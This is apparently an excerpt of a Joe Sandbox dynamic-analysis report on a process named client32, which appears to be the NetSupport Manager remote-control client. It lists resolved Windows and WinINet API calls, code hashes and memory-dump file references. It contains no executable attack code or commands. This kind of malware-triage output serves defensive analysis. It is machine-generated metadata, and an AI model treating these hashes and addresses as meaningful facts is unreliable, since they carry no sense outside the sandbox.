                                                                                                                        • Instruction ID: b84ea583bbcc67d6cc27af3fec8a90da1cbf4919c96fbab9915af0e8229afa19
                                                                                                                        • Opcode Fuzzy Hash: 171890c2d46719c68e062ee8231ae023f816c0bb4ff5e3c6d71c6ac619cdb34e
                                                                                                                        • Instruction Fuzzy Hash: C8F05872600218AFCB20DFA8D944A9B77A8FB48721F81881AFD5697640C6B0F850CFA4
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 68594BA4
                                                                                                                        • SetLastError.KERNEL32(00000078,000000C8,?,6859B53C,00000000,0000002B,?,?), ref: 68594BCD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetQueryOptionA
                                                                                                                        • API String ID: 199729137-3310327128
                                                                                                                        • Opcode ID: b3f158f16bdc877d47d34436011f2b095c5cc03ca4452db047ccf745d165a882
                                                                                                                        • Instruction ID: 6eccc79f102b8c84b26900e81eded329f77cfdf4d193dfedc003adb4f3af22f3
                                                                                                                        • Opcode Fuzzy Hash: b3f158f16bdc877d47d34436011f2b095c5cc03ca4452db047ccf745d165a882
                                                                                                                        • Instruction Fuzzy Hash: 2DF05872654658AFCB60DF98D884E9B73A9EB48721F80881AFD5697640C670F8508BA0
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 68594D44
                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,6859B392,00000000,0000002B,?,?), ref: 68594D6D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetSetOptionA
                                                                                                                        • API String ID: 199729137-1247460590
                                                                                                                        • Opcode ID: 759d92660f808d16553d6265617f482f28c7bc787751c4b51a1b269162f63ea5
                                                                                                                        • Instruction ID: 8d72b28d78eb7d714cb1b389e3a823e420d7993e40cab24d0e1aa81440896138
                                                                                                                        • Opcode Fuzzy Hash: 759d92660f808d16553d6265617f482f28c7bc787751c4b51a1b269162f63ea5
                                                                                                                        • Instruction Fuzzy Hash: C6F01276654728AFC720DF94D848E9B77ACEB48B11F41445AFE69D7240C671EC10CBA4
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 68594DE4
                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,68599BCE,?,?,?,?), ref: 68594E0D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetWriteFile
                                                                                                                        • API String ID: 199729137-2273844942
                                                                                                                        • Opcode ID: 2f359217d3c3cf61b1b41fb6038e6f8b5f623a31c7f2feee71b4a18b341b6668
                                                                                                                        • Instruction ID: d3e47f435d9466fa36ad9f308ace816e4207efc694a55009c9a44b3aec31aa19
                                                                                                                        • Opcode Fuzzy Hash: 2f359217d3c3cf61b1b41fb6038e6f8b5f623a31c7f2feee71b4a18b341b6668
                                                                                                                        • Instruction Fuzzy Hash: FAF05E76614228AFC720DF99D804A9B77A8EB48711F40841AFD5597240C671E810CFA5
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11017039
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: QueueUserWorkItem
                                                                                                                        • API String ID: 199729137-2469634949
                                                                                                                        • Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
                                                                                                                        • Instruction ID: 351e0e434b9127e3d5833c8cdc34dd988e3f21fb5a429389f6b6525592fa6d03
                                                                                                                        • Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
                                                                                                                        • Instruction Fuzzy Hash: 6DF08C32A10328AFC310DFA8D844E9BB7A8FB48721F40842AF94087600C630F8008BA0
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback), ref: 68594D94
                                                                                                                        • SetLastError.KERNEL32(00000078,02B42AFC,?,6859B267,00000000,68596BD0), ref: 68594DB5
                                                                                                                        Strings
                                                                                                                        • InternetSetStatusCallback, xrefs: 68594D8E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetSetStatusCallback
                                                                                                                        • API String ID: 199729137-894424467
                                                                                                                        • Opcode ID: 9da00872f1cea283c7ae1a1649133b870eafbe8c4a6dbff208699b6a5dd6d958
                                                                                                                        • Instruction ID: 5ee7f3de0483ec66c799b3f32507f3ab0bfed22a79f5b09a5da557adc140e61d
                                                                                                                        • Opcode Fuzzy Hash: 9da00872f1cea283c7ae1a1649133b870eafbe8c4a6dbff208699b6a5dd6d958
                                                                                                                        • Instruction Fuzzy Hash: A4E06536944724AFC720AF98D848A9AB7BCEF44721F41445BED55D7200D671E840CBD0
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11031055
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: ProcessIdToSessionId
                                                                                                                        • API String ID: 199729137-2164408197
                                                                                                                        • Opcode ID: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
                                                                                                                        • Instruction ID: c15e5fa19e0f6f6798f22c3181eac8c4efc8dc53165636b7ac94afd6ac4f5e0b
                                                                                                                        • Opcode Fuzzy Hash: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
                                                                                                                        • Instruction Fuzzy Hash: A9E06532A552245FC310DFB5D844E56F7E8EB58762F00C52AF95997200C670A801CFA0
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthA.USER32(75BF1A30), ref: 11157303
                                                                                                                          • Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2
                                                                                                                        • GetWindowTextA.USER32(75BF1A30,00000000,00000001), ref: 1115731D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: TextWindow$Length_memset
                                                                                                                        • String ID: ...
                                                                                                                        • API String ID: 243528429-1685331755
                                                                                                                        • Opcode ID: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
                                                                                                                        • Instruction ID: 3e974f6f281fad8de38b3af03667cb2bd2dd56defaaa0821f91d93156a413d34
                                                                                                                        • Opcode Fuzzy Hash: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
                                                                                                                        • Instruction Fuzzy Hash: 7DE02B36D046635FD281463C9C48DCBFB9DEF82228B458470F595D3201DA20D40BC7E0
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 685ADC59
                                                                                                                          • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                          • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                          • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                        • _memset.LIBCMT ref: 685ADC82
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_malloc_memset
                                                                                                                        • String ID: Refcount.cpp
                                                                                                                        • API String ID: 2365696598-3480236496
                                                                                                                        • Opcode ID: baf27fe8afef23391ff23740882127b825b5fec662b5c086803bf65280c55887
                                                                                                                        • Instruction ID: ef2d55bf166b70fd2ad4821a0048106b91b03f14d70d4b1aa3d43a89db7bf011
                                                                                                                        • Opcode Fuzzy Hash: baf27fe8afef23391ff23740882127b825b5fec662b5c086803bf65280c55887
                                                                                                                        • Instruction Fuzzy Hash: 7FE0C22BAC012577C15020DA3C16EEFBA5C4BE2DE9F850031FE0CA6241F6916D5141EA
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68594C44
                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,6859B677,?), ref: 68594C61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetCloseHandle
                                                                                                                        • API String ID: 199729137-3843628324
                                                                                                                        • Opcode ID: 2eac23ddf6233cd62f0a9ecce76bea5241ba22dea79b4b40652151221878621f
                                                                                                                        • Instruction ID: 02e7a4ed6fd61c2d8e1da0e4005355e902d63d7eccfa9afd8f288fdac1f04e0f
                                                                                                                        • Opcode Fuzzy Hash: 2eac23ddf6233cd62f0a9ecce76bea5241ba22dea79b4b40652151221878621f
                                                                                                                        • Instruction Fuzzy Hash: D2E0D832944724AFC730EFA8D808A8ABBF8EF24721F41052BE955D7201C670E884CBD4
                                                                                                                        APIs
                                                                                                                        • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        • m_hWnd, xrefs: 11001096
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 2046328329-2830328467
                                                                                                                        • Opcode ID: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
                                                                                                                        • Instruction ID: d6c174be7095a88acf08c8c7035f1bfcc606cf11c581344454f7ad96a18f94da
                                                                                                                        • Opcode Fuzzy Hash: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
                                                                                                                        • Instruction Fuzzy Hash: 68E01AB6610269AFD714DE85EC80EE7B3ACAB48794F008429FA5997240D6B0E95087A1
                                                                                                                        APIs
                                                                                                                        • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        • m_hWnd, xrefs: 11001056
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 819365019-2830328467
                                                                                                                        • Opcode ID: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                        • Instruction ID: 2149dfb7d7fad2f484445a2ad992c90f1569e5591f5ea3f8663e4569b2fc6047
                                                                                                                        • Opcode Fuzzy Hash: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
                                                                                                                        • Instruction Fuzzy Hash: 6EE086B5A00359BFD710DE45DCC5FD7B3ACEF54765F008429F95987240D6B0E99087A1
                                                                                                                        APIs
                                                                                                                        • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        • m_hWnd, xrefs: 110010E6
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
